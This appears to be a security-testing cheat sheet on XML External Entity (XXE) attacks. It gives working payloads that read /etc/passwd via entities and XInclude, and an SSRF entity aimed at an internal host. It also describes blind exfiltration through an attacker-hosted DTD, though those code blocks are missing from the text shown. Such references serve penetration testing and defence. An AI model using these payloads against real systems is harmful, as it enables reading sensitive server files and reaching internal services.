XML external entity (XXE)
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
-- Wikipedia
Generally, XXE vulnerabilities arise when resolution of external entities and/or XInclude is enabled in the app/xml parser.
Retrieve files
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE file [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<some><xml>&xxe;</xml></some>SSRF
<!DOCTYPE request [ <!ENTITY xxe SYSTEM "http://internal.website.com"> ]>XInclude
You may be able to use XInlcude when you don't have control over the DOCTYPE element, e.g. in SOAP requests.
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>File uploads
Sometimes XML based files like SVG or DOCX can be uploaded and are then processed by the app.
E.g. XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250]
Blind XXE
You can use out-of-band (OAST) to detect blind XXE vulnerabilities (e.g. using Burp Collaborator).
Via parameter entities:
Exfiltrate data
Create a malicious.dtd file, hosted on attacker controlled system:
XXE payload on target:
Retrieve data via error message
Create a malicious.dtd file, hosted on attacker controlled system:
XXE payload on target:
Modified content type
Some apps accept text/xml as content type of POST requests instead of e.g. application/x-www-form-urlencoded.
If so, malicious XML can be send to and will be proccessed by the app and my be exploitable that way.
Last updated